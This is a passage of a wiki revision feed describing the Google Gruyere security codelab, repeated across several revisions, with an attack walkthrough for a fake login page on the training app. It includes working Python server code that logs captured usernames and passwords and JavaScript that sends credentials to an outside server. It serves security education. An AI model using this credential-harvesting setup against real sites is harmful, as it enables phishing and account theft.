* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server. The log file is named passwrd.log in this example:&lt;br /&gt;
  from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
  import os&lt;br /&gt;
  from datetime import datetime&lt;br /&gt;
  from urllib.parse import parse_qs&lt;br /&gt;
  # Pfad zur Datei, in die geschrieben werden soll&lt;br /&gt;
  LOG_FILE = &amp;quot;passwrd.log&amp;quot;&lt;br /&gt;
  class RequestHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_OPTIONS(self):&lt;br /&gt;
        # CORS-Header für Preflight-Anfragen setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Methods&#039;, &#039;POST, OPTIONS&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Headers&#039;, &#039;Content-Type&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
    def do_POST(self):&lt;br /&gt;
        # CORS-Header setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        # Content-Length auslesen, um die Größe der Daten zu kennen&lt;br /&gt;
        content_length = int(self.headers[&#039;Content-Length&#039;])&lt;br /&gt;
        post_data = self.rfile.read(content_length).decode(&#039;utf-8&#039;)&lt;br /&gt;
        # Eingabedaten parsen&lt;br /&gt;
        data = parse_qs(post_data)&lt;br /&gt;
        username = data.get(&#039;username&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        password = data.get(&#039;password&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        # Aktuelles Datum und Uhrzeit&lt;br /&gt;
        timestamp = datetime.now().strftime(&#039;%Y-%m-%d [%H:%M:%S]&#039;)&lt;br /&gt;
        # Logeintrag erstellen&lt;br /&gt;
        log_entry = f&amp;quot;{timestamp}: Username: {username} / Password: {password}\n&amp;quot;&lt;br /&gt;
        # Daten in die Datei schreiben&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;a&amp;quot;) as file:&lt;br /&gt;
            file.write(log_entry)&lt;br /&gt;
        # Erfolgsnachricht senden&lt;br /&gt;
        self.wfile.write(b&amp;quot;Data saved successfully\n&amp;quot;)&lt;br /&gt;
  # HTTP-Server starten&lt;br /&gt;
  def run_server():&lt;br /&gt;
    server_address = (&amp;quot;0.0.0.0&amp;quot;, 8080)&lt;br /&gt;
    httpd = HTTPServer(server_address, RequestHandler)&lt;br /&gt;
    print(f&amp;quot;Server running on http://0.0.0.0:8080, writing to {LOG_FILE}&amp;quot;)&lt;br /&gt;
    httpd.serve_forever()&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # Sicherstellen, dass die Logdatei existiert&lt;br /&gt;
    if not os.path.exists(LOG_FILE):&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;w&amp;quot;) as file:&lt;br /&gt;
            file.write(&amp;quot;&amp;quot;)&lt;br /&gt;
    run_server()&lt;br /&gt;
&lt;br /&gt;
If you are using an online instance of Google Gruyere webpage you might need to bypass HTTPS. You can use ngrok to do so (https://ngrok.com).&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 2: Create a Login HTML&amp;lt;/h3&amp;gt;&lt;br /&gt;
You can create any kind of login page but make sure to include an input for username and password. Your page should contain a script that executes a HTTP request to your local server. This is an example:&lt;br /&gt;
  try {&lt;br /&gt;
          const response = await fetch(&lt;br /&gt;
            &amp;quot;https://&amp;lt;local-server-ip-address&amp;gt;&amp;quot;,&lt;br /&gt;
            {&lt;br /&gt;
              method: &amp;quot;POST&amp;quot;,&lt;br /&gt;
              headers: { &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot; },&lt;br /&gt;
              body: `username=${encodeURIComponent(&lt;br /&gt;
                username&lt;br /&gt;
              )}&amp;amp;password=${encodeURIComponent(password)}`,&lt;br /&gt;
              mode: &amp;quot;no-cors&amp;quot;, // Keine CORS-Prüfung durchführen&lt;br /&gt;
            }&lt;br /&gt;
          );&lt;br /&gt;
          if (response.ok) {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          } else {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          }&lt;br /&gt;
        } catch (error) {&lt;br /&gt;
          messageDiv.textContent =&lt;br /&gt;
            &amp;quot;An error occurred. Please check your connection.&amp;quot;;&lt;br /&gt;
        }&lt;br /&gt;
        form.reset();&lt;br /&gt;
      });&lt;br /&gt;
In this example the user is redirected to the Google Gruyere homepage after entering his information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 3: Upload file&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&amp;lt;br&amp;gt;&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&amp;lt;br&amp;gt;&lt;br /&gt;
3. You will get a link to where your file is available. Copy that link and move on to Step 4.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 4: Inject link to your page&amp;lt;/h3&amp;gt;&lt;br /&gt;
Here you can take it a step further and try to elevate your permissions in order to post this link for everybody on the homepage. But either way there is a Tab called &amp;quot;New Snippet&amp;quot; where you can inject html code to your malicious login page. This might look like this:&lt;br /&gt;
[[File:injection.png|thumb|none|400px|Injection]]&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 5: Start attack&amp;lt;/h3&amp;gt;&lt;br /&gt;
Your link will be available either on the homepage if you elevated your privileges, or on the &amp;quot;My Snippets&amp;quot; page.&lt;br /&gt;
Now start your server and wait for someone to fall into your trap.&lt;br /&gt;
[[File:MySnippets.png|thumb|none|300px|MySnippets Page]][[File:LoginPage.png|thumb|none|300px|Malicious Login Page]]&lt;br /&gt;
[[File:PasswordLog.png|thumb|none|300px|Log File]]&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17657</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17657"/>
		<updated>2024-12-18T20:11:01Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server. The log file is named passwrd.log in this example:&lt;br /&gt;
  from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
  import os&lt;br /&gt;
  from datetime import datetime&lt;br /&gt;
  from urllib.parse import parse_qs&lt;br /&gt;
  # Pfad zur Datei, in die geschrieben werden soll&lt;br /&gt;
  LOG_FILE = &amp;quot;passwrd.log&amp;quot;&lt;br /&gt;
  class RequestHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_OPTIONS(self):&lt;br /&gt;
        # CORS-Header für Preflight-Anfragen setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Methods&#039;, &#039;POST, OPTIONS&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Headers&#039;, &#039;Content-Type&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
    def do_POST(self):&lt;br /&gt;
        # CORS-Header setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        # Content-Length auslesen, um die Größe der Daten zu kennen&lt;br /&gt;
        content_length = int(self.headers[&#039;Content-Length&#039;])&lt;br /&gt;
        post_data = self.rfile.read(content_length).decode(&#039;utf-8&#039;)&lt;br /&gt;
        # Eingabedaten parsen&lt;br /&gt;
        data = parse_qs(post_data)&lt;br /&gt;
        username = data.get(&#039;username&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        password = data.get(&#039;password&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        # Aktuelles Datum und Uhrzeit&lt;br /&gt;
        timestamp = datetime.now().strftime(&#039;%Y-%m-%d [%H:%M:%S]&#039;)&lt;br /&gt;
        # Logeintrag erstellen&lt;br /&gt;
        log_entry = f&amp;quot;{timestamp}: Username: {username} / Password: {password}\n&amp;quot;&lt;br /&gt;
        # Daten in die Datei schreiben&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;a&amp;quot;) as file:&lt;br /&gt;
            file.write(log_entry)&lt;br /&gt;
        # Erfolgsnachricht senden&lt;br /&gt;
        self.wfile.write(b&amp;quot;Data saved successfully\n&amp;quot;)&lt;br /&gt;
  # HTTP-Server starten&lt;br /&gt;
  def run_server():&lt;br /&gt;
    server_address = (&amp;quot;0.0.0.0&amp;quot;, 8080)&lt;br /&gt;
    httpd = HTTPServer(server_address, RequestHandler)&lt;br /&gt;
    print(f&amp;quot;Server running on http://0.0.0.0:8080, writing to {LOG_FILE}&amp;quot;)&lt;br /&gt;
    httpd.serve_forever()&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
    # Sicherstellen, dass die Logdatei existiert&lt;br /&gt;
    if not os.path.exists(LOG_FILE):&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;w&amp;quot;) as file:&lt;br /&gt;
            file.write(&amp;quot;&amp;quot;)&lt;br /&gt;
    run_server()&lt;br /&gt;
&lt;br /&gt;
If you are using an online instance of Google Gruyere webpage you might need to bypass HTTPS. You can use ngrok to do so (https://ngrok.com).&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 2: Create a Login HTML&amp;lt;/h3&amp;gt;&lt;br /&gt;
You can create any kind of login page but make sure to include an input for username and password. Your page should contain a script that executes a HTTP request to your local server. This is an example:&lt;br /&gt;
  try {&lt;br /&gt;
          const response = await fetch(&lt;br /&gt;
            &amp;quot;https://&amp;lt;local-server-ip-address&amp;gt;&amp;quot;,&lt;br /&gt;
            {&lt;br /&gt;
              method: &amp;quot;POST&amp;quot;,&lt;br /&gt;
              headers: { &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot; },&lt;br /&gt;
              body: `username=${encodeURIComponent(&lt;br /&gt;
                username&lt;br /&gt;
              )}&amp;amp;password=${encodeURIComponent(password)}`,&lt;br /&gt;
              mode: &amp;quot;no-cors&amp;quot;, // Keine CORS-Prüfung durchführen&lt;br /&gt;
            }&lt;br /&gt;
          );&lt;br /&gt;
          if (response.ok) {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          } else {&lt;br /&gt;
            window.location.href =&lt;br /&gt;
              &amp;quot;https://google-gruyere.appspot.com/&amp;lt;id-of-your-online-instace-homepage&amp;gt;/&amp;quot;;&lt;br /&gt;
          }&lt;br /&gt;
        } catch (error) {&lt;br /&gt;
          messageDiv.textContent =&lt;br /&gt;
            &amp;quot;An error occurred. Please check your connection.&amp;quot;;&lt;br /&gt;
        }&lt;br /&gt;
        form.reset();&lt;br /&gt;
      });&lt;br /&gt;
In this example the user is redirected to the Google Gruyere homepage after entering his information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 3: Upload file&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1. Create an user account on Google Gruyere webpage&amp;lt;br&amp;gt;&lt;br /&gt;
2. Go to the &amp;quot;Upload&amp;quot; Tab and upload the code of your login page&amp;lt;br&amp;gt;&lt;br /&gt;
3. You will get a link to where your file is available. Copy that link and move on to Step 4.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 4: Inject link to your page&amp;lt;/h3&amp;gt;&lt;br /&gt;
Here you can take it a step further and try to elevate your permissions in order to post this link for everybody on the homepage. But either way there is a Tab called &amp;quot;New Snippet&amp;quot; where you can inject html code to your malicious login page. This might look like this:&lt;br /&gt;
[[File:injection.png|thumb|none|400px|Injection]]&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 5: Start attack&amp;lt;/h3&amp;gt;&lt;br /&gt;
Your link will be available either on the homepage if you elevated your privileges, or on the &amp;quot;My Snippets&amp;quot; page.&lt;br /&gt;
Now start your server and wait for someone to fall into your trap.&lt;br /&gt;
[[File:MySnipptes.png|thumb|none|300px|MySnippets Page]][[File:LoginPage.png|thumb|none|300px|Malicious Login Page]]&lt;br /&gt;
[[File:PasswordLog.png|thumb|none|300px|Log File]]&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://owasp.org/www-project-webgoat/ OWASP Webgoat]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=DVWA DVWA (Damn Vulnerable Web Application)]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://google-gruyere.appspot.com/&lt;br /&gt;
* https://google-gruyere.appspot.com/part1&lt;br /&gt;
* https://google-gruyere.appspot.com/start&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
* https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17655</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17655"/>
		<updated>2024-12-18T20:09:36Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;AJAX Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Vulnerabilities in Asynchronous JavaScript and XML (AJAX) applications that often lead to problems such as insufficient validation of input data or insecure API endpoints.&lt;br /&gt;
&lt;br /&gt;
== Attack Example ==&lt;br /&gt;
&amp;lt;h3&amp;gt;Idea: &amp;lt;/h3&amp;gt;Inject a simulated HTML login page that mimics a certified platform. This page incorporates a script to capture the users login data and transmit it to an external malicious server, that logs the information.&lt;br /&gt;
&amp;lt;h3&amp;gt;Step 1: Python Server&amp;lt;/h3&amp;gt;&lt;br /&gt;
Create a local HTTP server with python using BaseHTTPRequestHandler and HTTPServer from http.server. The log file is named passwrd.log in this example:&lt;br /&gt;
  from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
  import os&lt;br /&gt;
  from datetime import datetime&lt;br /&gt;
  from urllib.parse import parse_qs&lt;br /&gt;
  # Pfad zur Datei, in die geschrieben werden soll&lt;br /&gt;
  LOG_FILE = &amp;quot;passwrd.log&amp;quot;&lt;br /&gt;
  class RequestHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_OPTIONS(self):&lt;br /&gt;
        # CORS-Header für Preflight-Anfragen setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Methods&#039;, &#039;POST, OPTIONS&#039;)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Headers&#039;, &#039;Content-Type&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
    def do_POST(self):&lt;br /&gt;
        # CORS-Header setzen&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header(&#039;Access-Control-Allow-Origin&#039;, &#039;*&#039;)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        # Content-Length auslesen, um die Größe der Daten zu kennen&lt;br /&gt;
        content_length = int(self.headers[&#039;Content-Length&#039;])&lt;br /&gt;
        post_data = self.rfile.read(content_length).decode(&#039;utf-8&#039;)&lt;br /&gt;
        # Eingabedaten parsen&lt;br /&gt;
        data = parse_qs(post_data)&lt;br /&gt;
        username = data.get(&#039;username&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        password = data.get(&#039;password&#039;, [&#039;&#039;])[0]&lt;br /&gt;
        # Aktuelles Datum und Uhrzeit&lt;br /&gt;
        timestamp = datetime.now().strftime(&#039;%Y-%m-%d [%H:%M:%S]&#039;)&lt;br /&gt;
        # Logeintrag erstellen&lt;br /&gt;
        log_entry = f&amp;quot;{timestamp}: Username: {username} / Password: {password}\n&amp;quot;&lt;br /&gt;
        # Daten in die Datei schreiben&lt;br /&gt;
        with open(LOG_FILE, &amp;quot;a&amp;quot;) as file:&lt;br /&gt;
            file.write(log_entry)&lt;br /&gt;
        # Erfolgsnachricht senden&lt;br /&gt;
        self.wfile.write(b&amp;quot;Data saved successfully\n&amp;quot;)&lt;br /&gt;
  # HTTP-Server starten&lt;br /&gt;
  def run_server():&lt;br /&gt;
    server_address = (&amp;quot;0.0.0.0&amp;quot;, 8080)&lt;br /&gt;
    httpd = HTTPServer(server_address, RequestHandler)&lt;br /&gt;
